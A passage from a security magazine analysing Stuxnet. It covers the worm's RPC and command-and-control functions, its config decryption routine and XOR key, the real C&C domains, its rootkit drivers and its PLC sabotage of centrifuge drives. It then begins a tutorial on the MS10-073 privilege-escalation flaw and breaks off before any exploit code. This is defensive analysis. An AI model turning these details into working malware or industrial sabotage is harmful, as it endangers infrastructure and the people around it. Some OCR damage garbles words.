proliferation have been added to it by its designers. Among these are functionalities allowing it to spread, hide itself and lastly to update itself. These correspond, overall, to the various functions (21) exported by Stuxnet's main module: Function 1: infect removable media and launch the RPC server; Function 2: intercept the calls to certain functions in order to infect .S7P and .MCP les corresponding to Step7 projects; Function 4: initiate the Stuxnet uninstallation procedure; Function 5: check that the rootkit (the kernel driver MrxCls.sys) is correctly installed; Functions 6 and 7: return the version of Stuxnet installed; Functions 9, 10 and 31 (13?): update the malware from Step7 les Function 14: infect Step7 les; Function 15: point of entry for the system-infection routine; Function 16: infect the system (installation of drivers, DLLs, resources, code injection, etc.); Function 17: replace a Step 7 DLL so as to be able to intercept the calls to certain functions; Function 18: complete uninstallation of the malware; Function 19: infect a USB drive; Function 22: infect remote systems via the local network; Function 24: check the Internet connection; Function 27: RPC server; Function 28: dialogue with the command and control (C&C) server; Function 29: dialogue with the C&C server and execute the code returned; Function 32: RPC server used by the service server to respond to certain RPC calls; Several network functionalities are implemented within the malware. Among these are the RPC client and server. P2P communications and the use of a C&C are mainly used to keep the malware up to date and to recover information. Nevertheless, these could be used to download and install other malware or to exltrate sensitive information stolen from the compromised system.
exakta
Several other functionalities useful to the malware's
WWW.XMCO.FR

Installation of an RPC server The RPC server is subdivided into two components for managing local and remote RPC calls. For this, Stuxnet infects different processes according to the type of RPC call to be managed: "services.exe" for "local" calls, or one of the processes "netsvc", "rpcss" or "browser" for remote RPC calls. The various RPC methods are as follows: Method 1: returns the version of Stuxnet; Method 2: loads the module passed as a parameter in a new process and executes the specied exported function; Method 3: loads the module passed as a parameter into the memory space of the current process and calls the rst exported function; Method 4: loads the module passed as a parameter into a new process and executes it; Method 5: creates a "dropper" and sends it to a compromised system; Method 6: executes the specied application; Method 7: reads the data from the specied le; Method 8: writes the data into the specied le; Method 9: deletes a le; Method 10: performs various tasks from the names of les intercepted using the "hooks" installed by "Method 2", and writes the information into a log le. It appears that the last three methods implemented are not used by Stuxnet. Thanks to this mechanism based on RPC which can be used within the context of P2P communications, Stuxnet is, among other things, able to update itself on a local network from another compromised system. C&C communications The second functionality related to the network is a module for communicating with one of the command and control (C&C) servers. Like the "P2P over RPC" function, the module allows a compromised system to load malicious code into memory and execute it. The list of command and control servers is specied in the "%WINDIR% conguration le \inf\mdmcpq3.pnf". This le of 1,860 bytes may be decrypted with the following function:
ACTU SCU 27
#decrypt function on python def decrypt(key, counter, sym): v0 = key * counter v1 = v0 >> 0xb v1 = (v1 ^ v0) * 0x4e35 v2 = v1 & 0xffff v3 = v2 * v2 v4 = v3 >> 0xd v5 = v3 >> 0x17 xorbyte = ((v5 & 0xff) + (v4 & 0xff)) & 0xff xorbyte = xorbyte ^ ((v2 >> 8) & 0xff) xorbyte = xorbyte ^ (v2 & 0xff) return xorbyte ^ sym
This le contains several items of information, such as the list of servers used to check the Internet connection ("www.windowsupdate.com", "www.msn.com"), the list of C&C servers ("www.mypremierfutbol.com", "www.todaysfutbol.com"), the dates and times of activation and deactivation of the worm, after which the worm installs itself automatically using the previouslymentioned functions, the version of the malware, the minimum number of les that a USB drive must contain to be able to be infected using malicious LNK les, and lastly, other ancillary information used for the correct functioning of the worm and its propagation.
Concerning the functioning mode of the C&C servers, an instance of Stuxnet does not exchange plaintext messages with the two previously-mentioned servers. Each of the messages sent over the Internet to the servers is encrypted using a very simple algorithm. This is a simple XOR with the following 31-byte key:
// Encryption char Key[31] = { 0x67, 0xA9, 0x28, 0x90, 0x0D, 0x58, 0xD6, 0xA4, 0x5D, 0xE2, 0x66, 0xC0, 0x4A, 0x57, 0x88, 0x5A, 0xB0, 0x6E, 0x45, 0x56, 0x1A, 0xBD, 0x7C, 0x71, 0x42, 0xE4, 0xC1 };
0x6E, 0x72, 0x5C, 0x5E,
WWW.XMCO.FR
// Encryption procedure void EncryptData(char *Buffer, int BufferSize, char *Key) { for (int i = 0 ; i < BufferSize ; i ++) Buffer[i] ^= Key[i % 31]; return; }

The structure of a message sent by the malware is quite complex. It contains much information specic to the victim. Among this is information related to the network interfaces, the version of the OS and of the malware. This message is simply sent to a server that sends an HTTP GET request to one of the URLs listed in the conguration le. For example: http:// www.mypremierfutbol.com/index.php? data=STUXNET_CC_MESSAGE. In response to this request, the server returns a message composed of several items: a size coded over 4 bytes, a ag coded over 1 byte and lastly an executable image. If the size of the received message does not correspond to the indicated size of the image + 5 bytes, the malware ignores this response. If the size corresponds, according to the value of the ag, the malware loads the executable image into the memory space of the current process or into another process using one of the dedicated RPC methods, then executes it. It nevertheless appears that this important functionality has not really been used, neither to update the software nor to install additional malicious tools. It nevertheless acts as a hijacked port. The rapid blocking of the d o m a i n s w w w. m y p r e m i e r f u t b o l . c o m e t www.todaysfutbol.com perhaps had a role in this. Seeking and infecting the WinCC environment Lastly, to maximize the efciency of the proliferation operation, the malware seeks the WinCC software. Once it is discovered, Stuxnet connects to the database used by the software, using a standard hardcoded password. Once connected to this database, the malware sends the malicious code via SQL requests, then executes it. This rst action compromises the MSSQL server. Then, the malware modies the SQL views dened on the server to force the execution of code each time these views are accessed. Stuxnet is at last capable of infecting WinCC / Step7 projects associated with WinCC Simatic Manager. The les that are sought and modied have the extensions .S7P, .MCP or .TMP. Under certain specic conditions, les with the names "xutils\listen \xr000000.mdx", "xutils\links\s7p00001.dbf" and "xutils \listen\s7000001.mdx" or "GracS\cc_alg.sav", "GracS \db_log.sav" and "GracS\cc_alg.sav" are deposited. In both cases, these les correspond respectively to an encrypted version of the malware's main DLL, to a data le of 90 bytes and lastly, an encrypted version of
ACTU SCU 27
Stuxnet's block of conguration data. Lastly, a speciallydesigned DLL is placed in the multiple sub-directories of the directory "hOmSave7". The infection mechanism is relatively simple. When the project is opened using WinCC Simatic Manager, the DLL placed in the sub-directories of the directory "hOmSave7" is automatically sought. When this is loaded, the library decrypts the protected data and loads the malware's main component into memory to complete the process of infection.
Lastly, to maximize the efficiency of the

proliferation operation, the malware searches for the WinCC software. When it is discovered, Stuxnet connects to the database used by the software using a standard hard-coded password.
Persistence To ensure the persistence of the functionalities previously installed, Stuxnet nevertheless has to profoundly modify the system. This is because it is not possible to inject code into arbitrary processes or to sustainably hide les in the user area without profound modications to the system. Two system drivers signed with private keys corresponding to certicates belonging to Realtech and JMicron are therefore installed using the elevated privileges obtained from the two proofs of concept (Keyboard Layout and Task Scheduler). "MrxCls.sys" is used to inject code into a process. "MrxNet.sys" is a rootkit for hiding the malicious les used to exploit the LNK vulnerability. In contrast to the rootkit used in the user area, this one is persistent. The fact that these last are signed with stolen certicates means that they can be more discreetly installed so as not to arouse the user's suspicions (signature essential for installing drivers under Windows 7/Windows Vista). The ".lnk" les with a size of 1,471 bytes, and the "WTRabcd.tmp" les, for which the sum of a, b, c and d modulo 10 is equal to 0 are ltered so that they are not displayed by the le explorer. This lter is active only for the le systems NTFS, FAT and CDFS. After being registered using the function "FileSystemRegistrationChange()", the driver is called each time a le system is mounted and can therefore monitor the requests that are sent to it. Thus, the driver can act with complete impunity and choose which les to display in a directory.
WWW.XMCO.FR
ACTU SCU 27
1: The pirate manages to infect a USB drive used by a person working on a computer connected to the target information system. 2: The person uses their USB drive within the target information system's LAN. 3: After having infected a Windows workstation, Stuxnet seeks to spread across the LAN. 4: Sutxnet contacts its C&C server. 5: An employee whose USB drive has been contaminated connects to a workstation equipped with WinCC software and belonging to an industrial network. 6: When this contaminated workstation connects to a PLC, Stuxnet deposits the malicious code corresponding to PLC 0 7: The malicious code sends specic orders to the variable frequency drives. 7 bis: The person responsible for supervising the equipment cannot identify the presence of Stuxnet.
WWW.XMCO.FR

The resources embedded by Stuxnet " " " " " The two previously-mentioned drivers correspond respectively to resources 201 and 242 of the main module. Eleven other resources are also available, such as an executable module PE (210), a link le LNK (240), and a block of conguration data for the driver "MrxCls.sys" (205) Resource 201: driver "MrxNet.sys" signed using certicates belonging to RealTech or JMicron; Resource 202: DLL used in compromising Step 7 projects; Resource 203: CAB le containing an equivalent of resource 202 used for compromising WinCC projects; Resource 205: encrypted conguration-data le for the driver "MrxCls.sys"; Resource 208: shared library "s70tbldx.dll" usurping the functions of the original Siemens DLL; Resource 209: le of 25 bytes containing encrypted data deposited in "%WINDIR%\help \winmic.fts"; Resource 210: model of PE le used for creating or injecting executables ("-WTR4132.TMP"); Resource 221: malicious code used for exploiting the security vulnerability present in the server service (MS08-067) Resource 222: malicious code used for exploiting the security vulnerability present in the print spooler (MS10-061) Resource 240: model LNK le
ACTU SCU 27
keyboard layout (Keyboard Layout) (MS10-073) The following exports were observed by Symantec in the older versions of Stuxnet, but have disappeared in the "latest" conversions: Resource 207: Information related to the exploitation of a vulnerability using Autorun.inf. Resource 231: Resource used to check whether the system is connected to the Internet or not.
INFO
Definitions
PLC: Programmable Logic Controller Large-scale remote-control system for the real-time processing of a large number of remote measurements and for remotely controlling technical facilities. It is an industrial technology in the field of instrumentation. A programmable controller is a programmable electronic device for controlling industrial processes by sequential processing. It sends orders towards the preactuators (operative section or operative section on the actuator side) from input data (sensors) (control section or control section on the sensor side), instructions and a computer program.
ensure the persistence of the functionalities previously installed, Stuxnet nevertheless has to profoundly modify the system. This is because it is not possible to inject code into arbitrary processes or to sustainably hide files in the user area without profound modifications to the system ...
To
SCADA: Supervisory Control And Acquisition (tlsurveillance acquisition de donnes)
Data et
Large-scale remote-control system for the real-time processing of a large number of remote measurements and for remotely controlling technical facilities. It is an industrial technology in the field of instrumentation.
Resource 241: "-WTR4141.TMP", DLL used for loading the executable corresponding to resource 221 "WTR4132. TMP" responsible for installing malware (dropper) Resource 242: Driver "Mrxnet.sys" (Rootkit) used to mask the presence of certain les Resource 250: Malicious code used to exploit the security vulnerability present in the management of the
WWW.XMCO.FR

Phase 3: Attack on industrial systems
Detection of SCADA systems based on WinCC Once the Windows system has been compromised and the malware installed, the third phase of the attack can begin. This corresponds to the search for certain specic software. To access the SCADA system, the authors of the malware have chosen to go via the development tools associated with the target system: Step7 and WinCC. These two tools are respectively used to develop programs operating on systems of the PLC type and to check their correct functioning. Incidentally, these tools are potentially the only point of entry to these sensitive systems, given that they are not supposed to be connected to the Internet, but rather to a network dedicated to them. To carry out this third phase of the attack, the malware searches for and replaces the shared library "s7otbxdx.dll". This library, which comes from the Simatic software suite from Siemens, is used in order to have a PC running on Windows communicate with a PLC from the Simatic family. Usually, a developer programs their equipment with one of the numerous programming languages interpreted by the software suite, such as STL or SCL. This is subsequently compiled into a specic assembler code called "MC7", before being loaded on the PLC. By renaming the shared library "s70tbxdx.dll" as "s70tbxsx.dll", then by placing its own version of the library "s70tbxdx.dll", the malware is able to intercept all calls to the functions exported by the original library and to manipulate them at will. In fact, only the behavior of several functions is affected. Most of the calls to the functions of "s70tbxdx.dll" are directly sent to the equivalent functions in "s70tbxsx.dll".
ACTU SCU 27
The 16 functions whose behavior is altered correspond to the methods for reading ("s7blk_read"), writing ("s7blk_write"), enumeration ("s7blk_ndrst" and "s7blk_ndnext") and deletion ("s7blk_delete") of the blocks of code present on the PLC. It is by modifying certain key functions of this library that the attackers ensure the sustainability and discretion of their attack. To avoid detection when an operator rst connects to a compromised PLC, the "read" and "enumeration" functions hide certain blocks of code from the operator and only return the original "healthy" code. But not all PLCs are targeted. Stuxnet, using two threads launched by the malicious library, searches for precisely two types of appliance with the references Siemens 6ES7-315-2 and 6ES7-417. The main difference between these two models of controller is the quantity of embedded memory. 256 KB for the series S7-315 against 30 MB for the series S7-417. Module 315 Secondly, in the conguration targeted by the malware, the PLCs of series 300 (6ES7-315-2) must use between one and six Probus CP 342-5 modules to communicate with the systems under their control. Once again, only certain identication numbers are sought. In the case of Stuxnet, these are the Probus identication numbers "7050h" and "9500h". These numbers uniquely identify the models of these items of equipment, which are known as "frequency converter drives" or "variable frequency drives". The corresponding products are the "KFC750V3" manufactured by Fararo Paya based in Teheran in Iran, and the "Vacon NX" from Vacon based in Finland.
WWW.XMCO.FR

Variable frequency drives are generally used to control the speed of other components such as motors. Finally, the last criterion sought is the presence of at least 33 variable frequency drives among the two models previously mentioned. If these various extremely precise conditions are fullled, the process of infection begins by the modication of certain blocks of code such as DP_RECV, OB1 and OB35. These blocks of code are infected by overwriting or by increasing their sizes in order to introduce the malicious code at the beginning of the block. These operations ensure that the added code is executed when the block in question is called. The functions FC1865 and FC1874 are therefore respectively injected into blocks OB1 and OB35. Note: DP_RECV corresponds to the function in charge of managing the reception of data on the bus. OB1 corresponds to the main function, which is continuously executed. OB35 corresponds to a timer executed every 100 ms. In reality, Stuxnet may infect systems that correspond to its selection criteria in different ways. This is because two sequences of malicious code exist and may be used to infect a plc according to the distribution of the products that are controlled. The rst sequence, referenced A by Symantec, is selected when there is a majority of Vacon appliances. The second sequence, referenced B by Symantec, is used when a majority of Fararo Paya variable frequency drives are present. In all cases: the module 315 is designed to allow a PLC 6ES7-315-2 to control up to six Probus "masters" each controlling 31 "slave" converters, each on their dedicated Probus network. Finally, the attack 315, which corresponds to about 3,000 lines of STL code accompanied by 4 blocks of data (DB888, DB889, DB890 and DB891), is organized as follows: The code block DP _RECV is copied to the address FC1869, then replaced by malicious code which itself calls the original code that was moved. Each time a variable frequency drive sends data to a PLC 6ES7-315-2 via the Probus CP 342-5 module, its data is transferred to the original code before being reprocessed by the added malicious code. Each of the messages to be processed must be in a specic format when it is examined by DP _RECV. Namely, it must be composed of 31 records of 28 or 32 bytes corresponding to each of the converters.
ACTU SCU 27
Subsequently, the system goes into a state machine clearly described by Symantec. The transition between each state is governed by timers, tests or by the end of other tasks. Approximately, the system collects data for a period of between 13 days and three months, before sending falsied data on the communication bus for about 50 min, then returning to the initial state. According to Symantec's study, the system uses DP_RECV to inspect the messages sent by the variable frequency drives, which contains specic information corresponding to the current operating frequency. Lastly, this attack allows a pirate who has successfully injected their malicious code to withdraw the control that the legitimate blocks of code had on the data transmitted during the phase nicknamed "deadfoot" ("DEADF007" in the code). This phase corresponds to 50 min during which the PLC sends semi-arbitrary information to the various variable frequency drives through the Probus modules. The messages sent correspond to frequencies that must be converted into rotation speeds by the variable frequency drives. Furthermore, execution of the legitimate code is prevented using a call to the command BEC (Conditional Block End) instead of letting the execution of the program continue. Without
WWW.XMCO.FR

this, other contradictory information could be sent by the PLCs. During the offensive phase during which the falsied messages are sent, the orders given allow the attackers to vary the rotation speed of the motors by stages. In sequence A, when there are more Vacom variable frequency drives, the rst stage is placed at 1,410 Hz. This is then lowered to 2 Hz before being increased to 1,064 Hz. These large variations probably cause material damage to the motors, which are supposed to turn at frequencies of between 807 and 1,210 Hz.
ACTU SCU 27
the pre-recorded data is transmitted to the original logic, while the real data is processed by the malicious code. At the same time, the pirates control the output towards which they send the signals that they wish to send.
The purpose of this code sequence is to
Module 417 Another sequence of the malicious code is dedicated to PLCs referenced 6ES7-417. The code composing this sequence is more complex than that which targets PLCs of series 300. This module 417 is broken down into nearly 12,000 lines of STL code, accompanied by 10 blocks of data, partly loaded by the malicious DLL and partly generated dynamically. In the same way as for sequence 315, an injection of code into block OB1 ensures that the added malicious functions are called. Ralph Langner's analysis provides understanding of the role and functioning of this second sequence of code. According to him, the code added by the attackers to the PLC allows an attack that is much more complex than for module 315. This is because the code in question is used to carry out an attack of the "man-inthe-middle" type on the controller itself. In contrast to the previous sequence, for which the principle was based on modifying the results returned using a conditional jump (BEC) to prevent the execution of the original code, the purpose of this code sequence is to intercept the input/output signals to/from the PLC and to supply falsied pre-recorded values to the code in charge of the logic. This trick also allowed falsifying the signals returned upon output to avoid attracting the attention of an operator who may observe dubious signals. As the researcher emphasized, this attack is worthy of a Hollywood scenario in which the spies repeatedly send images to the control room corresponding to what the surveillance cameras should be seeing. In the same way as for code 315, a state machine could follow the progress of attack 417. During a rst phase, the role of the malicious code is to record the values to be subsequently replayed. Several other intermediate states correspond to the offensive phase, during which
intercept the signals going to and from the PLC and to supply pre-recorded falsified values to the code in charge of the logic. This trick can also falsify the signals returned upon output to avoid attracting the attention of an operator who may observe dubious signals.
Nevertheless, the presence of this code is particularly surprising, given that, according to the study by Symantec, it is not functional. This is because the library in charge of copying the malicious code on the PLC does not copy all of the code to allow the attack to function properly. Among other things, the block OB1, which, as previously, corresponds to the main function that is continuously called by the PLC, is not modied to trigger the call to the malicious functions. Furthermore, still according to Symantec, in contrast to the code in attack 315, the STL code in module 417 contains numerous comments and debugging functions that are characteristic of unnished work. However, Langner qualied this assumption. This particularly-large block of code (about 12,000 lines) could not have been designed for nothing (extremely complex code, which would have required signicant resources in time, personnel and technology). Furthermore, certain interactions related to this code were also highlighted in his laboratory. The researcher therefore concluded that, based on the study of the code embedded by Stuxnet, it is difcult to know whether or not it was operational in the attack carried out against Natanz, but that it had been deliberately designed like that. In all cases, module 417 of Stuxnet, just like module 315, seeks a SCADA architecture that meets certain very precise restrictions. These are six assemblies each containing 164 centrifuges. This condition was deduced by Langner from function FC 6069. This is used to store 984 (6 * 164) entries in data block DB 8063.
WWW.XMCO.FR

Destruction/Sabotage Once Stuxnet has identied and infected its target, the malware then begins a long phase during which slight variations will lead to a probable destruction of equipment, and above all to a reduction in the yield of the enrichment process. According to Ralph Langner, by collecting all the information relative to modules 315 and 417 recovered up to now, it is possible to deduce the precise architecture of the target system. This information partly comes from the study of the STL code and functions implemented, partly from the data that is processed, and lastly from scientic data on the functioning of a nuclear enrichment centre. A cascade of gas centrifuges is an assembly of 164 centrifuges placed one after the other. The rst handles the gas, then when its task is nished, it sends the gas into the second, and so on. To improve the yield of these cascades, physicists have discovered a specic assembly in which a cascade is divided into "stages". Each of these "stages" in the cascade is composed of one or more centrifuges, according to its location. Thus, the various stages are in series, while the centrifuges that compose them are placed in parallel. This cascade architecture, when it is correctly chosen, can maximize the quantity of enriched uranium produced. As described previously, module 315 precisely targets a uranium enrichment cascade. By slightly changing the rotation speed of the centrifuge, the malware causes premature wear that can lead to the self-destruction of the machine.
Stfan Le D
ACTU SCU 27
For its part, module 417 does not directly or indirectly target the steam turbines at the plant at Busherh, as Langner originally thought, but targets the system in charge of part of the safety system for the enrichment centre. Among other things, this system would be in charge of emptying a defective centrifuge to avoid an accident leading to its premature destruction. This highlevel security system allows gas to be passed from one centrifuge to another, avoiding accidents and minimizing disruption, while maintaining the production yield. Module 417 is therefore responsible for an assembly of 6 cascades of 164 centrifuges, namely 984.
Once Stuxnet has identified and infected

its target, the malware then begins a long phase during which slight variations will lead to a probable destruction of equipment, and above all to a reduction in the yield of the enrichment process.
By manipulating these two controllers in this way, Stuxnet would be capable of simultaneously causing the destruction of IR-1 centrifuges through premature wear and reducing their yield by modifying the theoretical organization and conguration of each of the cascades.
WWW.XMCO.FR

Questions/answers concerning F-Secure
Mikko Hypponen from the F-Secure laboratory has drawn up a list of particularly interesting questions that shed light on a large number of points. We have therefore selected the most relevant questions to conclude this article. What does it do then? It infects the system, hides itself with a rootkit and sees if the infected computer is connected to a Siemens Simatic (Step7) factory system. What does it do with Simatic? It modies commands sent from the Windows computer to the PLC (Programmable Logic Controllers, i.e. the boxes that actually control the machinery). Once running on the PLC, it looks for a specic factory environment. If this is not found, it does nothing. Which plant is it looking for? We don't know. Has it found the plant it's looking for? We don't know. What would it do if it nds it? The PLC modication searches for specic highfrequency converter drives (AC drives) and modies their operation. Stuxnet searches for specic AC drives manufactured by Vacon (based in Finland) and Fararo Paya (based in Iran). So does Stuxnet infect these Vacon and Fararo Paya drives? No. They drives do not get infected. The infected PLC modies how the drives run. The modication happens only when very specic conditions are all true at the same time, including an extremely high output frequency. Therefore, any possible effects would concern extremely limited AC drive application areas. Some suggest the target of Stuxnet was the Natanz enrichment facility in Iran. Are there Vacon AC drives in these facilities? According to Vacon, they are not aware of any Vacon drives in use in the Iranian nuclear program, and they can conrm that they have not sold any AC drives to Iran against the embargo. In theory, what can Stuxnet do? It can adjust the functioning of motors, pumps and conveyor belts. It can shut down a control unit. By changing the appropriate parameters, it can cause explosions.
ACTU SCU 27
Why is Stuxnet considered to be so complex? It uses multiple vulnerabilities and drops its own driver to the system. How can it install its own driver? Stuxnet driver was signed with a certicate stolen from Realtek Semiconductor Corp. Has the stolen certicate been revoked? Yes. VeriSign revoked it on July 16th. A modied variant signed with a certicate stolen from JMicron Technology Corp was found on July 17th. What's the relation between Realtek and Jmicron? Nothing. But these companies have their HQs in the same ofce park in Taiwan which is weird. Did the Stuxnet creators nd their own 0-day vulnerabilities or did they buy them from the black market? We don't know. How expensive would such vulnerabilities be? This varies. A single remote code execution zero-day in a popular version of Windows could go for anything between $50,000 to $500,000. Why was it so slow to analyze Stuxnet in detail? It's unusually complex and unusually big. Stuxnet is over 1.5MB in size. When did Stuxnet start spreading? In June 2009, or maybe even earlier. One of the components has a compile date in January 2009. How long did it take to create Stuxnet? We estimate that it took over 10 man-years to develop Stuxnet. Who could have written Stuxnet? Looking at the nancial and R&D investment required and combining this with the fact that there's no obvious money-making mechanism within Stuxnet, that leaves only two possibilities: a terror group or a nation-state. And we don't believe any terror group would have this kind of resources.
Was it Israel? Egypt? Saudi Arabia? USA? We don't know. Was the target Iran? We don't know.
WWW.XMCO.FR
So was Stuxnet written by a government? That's what it would look like, yes.

Is it true that there's are biblical references inside Stuxnet? There is a reference to "Myrtus" (which is a myrtle plant). However, this is not "hidden" in the code. It's an artifact left inside the program when it was compiled. Basically this tells us where the author stored the source code in his system. The specic path in Stuxnet is: \myrtus\src\objfre_w2k_x86\i386\guava.pdb. Could it mean something else? Yeah: it could mean "My RTUs", not "Myrtus". RTU is an abbreviation for Remote Terminal Units, used in factory systems. How does Stuxnet know it has already infected a machine? It sets a Registry key with a value "19790509" as an infection marker. What's the signicance of "19790509"? It's a date. 9th of May, 1979. What happened on 9th of May, 1979? Maybe it's the birthday of the author? Then again, on that date a Jewish-Iranian businessman called Habib Elghanian was executed in Iran. He was accused to be spying for Israel. Is there a link between Stuxnet and Concker? It's possible. Concker variants were found between November 2008 and April 2009. The rst variants of Stuxnet were found shortly after that. Both exploit the MS08-067 vulnerability. Both use USB sticks to spread. Both use weak network passwords to spread. And, of course, both are unusually complex. Is there a link to any other malware? Some Zlob variants were the rst to use the LNK vulnerability. Will Stuxnet spread forever? The current versions have a "kill date" of June 24, 2012. It will stop spreading on this date. How many computers did it infect? Hundreds of thousands.
ACTU SCU 27
For example, by breaking into a home of an employee, nding his USB sticks and infecting it. Then wait for the employee to take the sticks to work and infect his work computer. What does it do then? It infects the system, hides itself with a rootkit and sees if the infected computer is connected to a Siemens Simatic (Step7) factory system.
How could the attackers get a trojan like this into a secure facility?
WWW.XMCO.FR
But Siemens has announced that only 15 factories have been infected. They are talking about factories. Most of the infected machines are collateral infections, i.e. normal home and ofce computers that are not connected to SCADA systems.

References
ACTU SCU 27
Hackin9 (Printer spooler article) http://newsoft.dyndns.org/tech/PrintYourShell.pdf Symantec (Report plus blog) http://www.symantec.com/content/en/us/enterprise/ media/security_response/whitepapers/ w32_stuxnet_dossier.pdf h t t p : / / w w w. s y m a n t e c . c o m / c o n n e c t / b l o g - t a g s / w32stuxnet " OSVDB Microsoft Windows Shell LNK File Parsing Arbitrary Command Execution http://osvdb.org/show/osvdb/66387 Siemens SIMATIC WinCC Default Password http://osvdb.org/show/osvdb/66441 ESET(Report plus blog) h t t p : / / w w w. e s e t . c o m / r e s o u r c e s / w h i t e - p a p e r s / Stuxnet_Under_the_Microscope.pdf http://blog.eset.com/2010/09/23/eset-stuxnet-paper Microsoft Windows on 32-bit win32k.sys Keyboard Layout Loading Local Privilege Escalation http://osvdb.org/show/osvdb/68517 Microsoft Windows Print Spooler Service RPC Impersonation StartDocPrinter Procedure Remote Code Execution http://osvdb.org/show/osvdb/67988 " Microsoft http://www.microsoft.com/technet/security/bulletin/ MS08-067.mspx http://www.microsoft.com/technet/security/bulletin/ MS10-046.mspx http://www.microsoft.com/technet/security/bulletin/ MS10-061.mspx http://www.microsoft.com/technet/security/bulletin/ MS10-073.mspx http://www.microsoft.com/technet/security/bulletin/ MS10-092.mspx " Microsoft Windows on 32-bit Task Scheduler Crafted Application Local Privilege Escalation http://osvdb.org/show/osvdb/68518
Resources on Stuxnet http://blog.eset.com/2011/01/03/stuxnet-informationand-resources
F-Secure (FAQ) h t t p : / / w w w. f - s e c u r e . c o m / w e b l o g / a r c h i v e s / 00002040.html h t t p : / / w w w. f - s e c u r e . c o m / w e b l o g / a r c h i v e s / 00002066.html
Langner (Blog) http://www.langner.com/en/blog/ h t t p : / / w w w. c o n t r o l g l o b a l . c o m / a r t i c l e s / 2 0 11 / IndustrialControllers1101.html?page=print " " LEXSI http://cert.lexsi.com/weblog/index.php/2011/01/31/397dossier-stuxnet-de-la-vulnerabilite-lnk-au-sabotageindustriel
"
WWW.XMCO.FR
ISIS - Institute for Science and International Security http://isis-online.org/isis-reports/detail/did-stuxnet-takeout-1000-centrifuges-at-the-natanz-enrichment-plant/8
ACTU SCU 27
KEYBOARD LAYOUT
Keyboard Layout and MS10-073: a look at one of the vulnerabilities exploited by Stuxnet
2010 was notable for several Windows vulnerabilities allowing a user to elevate their privileges (Scheduler, KeyboardLayout, NtGdiEnableEUDC and Windows Class). Several exploitation codes were made public. In this article, we are going to study the KeyboardLayout (CVE-2010-2743 MS10-073) vulnerability used by the Stuxnet worm to elevate its privileges under Windows 2000 and XP, and learn how to develop an associated proof of concept.
Jon (xlibber)
Florent Hochwelker XMCO
Reminder
User permissions under Windows Under Windows, from version NT 3.51, it has been possible to create user accounts with restricted privileges, as well as administrator accounts. These ordinary users have limited permissions. For example, they cannot change certain system parameters, access directories belonging to other users or write into certain directories, such as the sensitive Windows directories. From Windows 1.0 to Windows 98, Microsoft's operating system did not really offer separation between the various users. This was partly due to the fact that Windows was still based on MS-DOS. The version NT 4.0 of Windows, which came out in 1996, was the rst Microsoft operating system to include permissions management on les and directories (ACL) using the NTFS le system. Using these mechanisms, a virus that succeeds in infecting a machine but which executes with the permissions of an ordinary user would have a great deal of difculty in entirely infecting a machine and hiding its presence within the system. Differences between "user-land" and "kernelland" Before going into explanations of the vulnerability, let us remember the difference between the kernel area (kernel-land) and the user area (user-land).
When a processor of the x86 family functions in protected mode, it is capable of isolating the various processes that it executes using a ring mechanism. There are 4 different rings: Rings 0, 1, 2 and 3. Under Windows, only ring 0 and ring 3 are used. The kernel, which is executed in ring 0, has all privileges. It can therefore access any memory space.
A program executed by an ordinary user

in ring 3 can only access addresses between Ox80000000 and OxFFFFFFFF.
The user's programs are isolated in ring 3 and cannot access the kernel memory space. Under Windows, the virtual memory space is addressed as shown in the diagram below for each process. Programs executed by ordinary users in ring 3 therefore cannot access addresses between Ox80000000 and OxFFFFFFFF corresponding to the kernel memory space (or at least not as ordinary users*).
* However, a user with administrator permissions can install a driver executing in ring 0, or, using certain APIs, modify the kernel memory zone. For example, under XP, the function NtSystemDebugControl() is used by the debugger Microsoft WinDbg.
[29]
WWW.XMCO.FR
KEYBOARD LAYOUT: ANALYSIS OF THE VULNERABILITY
ACTU SCU 27
The kernel provides a large number of system calls for performing numerous different actions. It is generally not advisable to call them directly.
When a program has to carry out certain tasks, it generally uses the APIs supplied by the Windows operating system. Let us take the example of the CreateFile API function, which can create or open a le on the disk.
Table of system calls For example, the Windows CreateFile function will use the system call NtCreateFile. The program therefore passes control to the kernel to create the requested le.
BreakPoint on the system call
g: continues the execution of the program kn: displays the call stack It is then possible, as an ordinary user, to send data that will be processed in ring 0. So, in order to take control in kernel-land mode (ring 0), a vulnerability must be found within a kernel function or in a driver (hardware drivers are also in ring 0) which allows control to be taken of ring 0 to access this protected memory area, to which access is normally prohibited. The various processes under Windows have a system of tokens corresponding to identities which specify the permissions assigned to each of them. Once ring 0 is controlled, it is possible to modify the token for our application and replace it with a system token (NT/
The program in the user area (ring 3) , will call the CreateFile function that is available in the kernel32.dll library. This library is also present in the user area. This function will perform several processes to check the parameters passed and then, through a system call, will pass control to the kernel.
WWW.XMCO.FR

LOCALAUTHORITY), which will give us full permissions.
ACTU SCU 27
INFO
Keyboard Layout: what is it ?
The Keyboard Layout is a binary file describing the layout of the keys on the keyboard. There is therefore one file per keyboard layout. These files are in the form of libraries (DLL files) and are available in the directory "Windows/ system32/". For example, the French keyboard corresponds to file "kbdfr.dll".
The vulnerability comes from an overow in the table of pointers used in the function xxxKENLSProcs contained in the library win32k.sys. win32k is a library of functions loaded into kernel-land (ring 0) and accessible via system calls, which, among other things, manages various graphical rendering tasks.
Vulnerable code within the function xxxKENLSProcs We can see that the code calls a pointer on the function call _aNLSVKFProc[ecx*4] taking, as a parameter, a value of a byte located at address [eax-83h]. This value corresponds to a table index, which originally contains only 3 entries representing 3 functions (indexed from 0 to 2). Before Microsoft published bulletin MS10-073, no check on its length was made. Consequently, it was then possible to overrun the table
Libraries corresponding to the various Keyboard Layouts present under Windows XP
Content of table aNLSVKFProc dds: displays the data in the table and the associated symbols
Keyboard Layout and Stuxnet The vulnerability that we are going to present was exploited by the Stuxnet virus. As a reminder, Stuxnet implemented two zero-day vulnerabilities allowing elevation of privileges on all versions of the Windows operating system (from 2000 to Seven). The KeyboardLayout vulnerability is used by the virus to elevate its privileges under Windows 2000 and XP.
WWW.XMCO.FR
For example, by specifying an index of 5, we can redirect the call to the address Ox60636261 located in the user area, where we may have previously placed our malevolent code (payload). As a reminder, the userland area contains addresses between OxOOOOOOOO and Ox7FFFFFFF. We can therefore allocate memory at the address Ox60636261 and write whatever we want to it. It is important to note that this

value may vary according to operating systems and service packs.
ACTU SCU 27
Analysis of the vulnerability

The vulnerability When Windows loads a new Keyboard Layout, it calls an API function "LoadKeyboardLayout()" present within the library user32.dll. This function takes an identier as a parameter, in the form of a character string, together with a ag.
For example, by specifying an index of 5,

we can redirect the call to the address Ox60636261 located in the user area, where we may have previously placed our malevolent code (payload)
Now let's get to the point of the subject: the exploitation of the vulnerability. Brace yourselves!
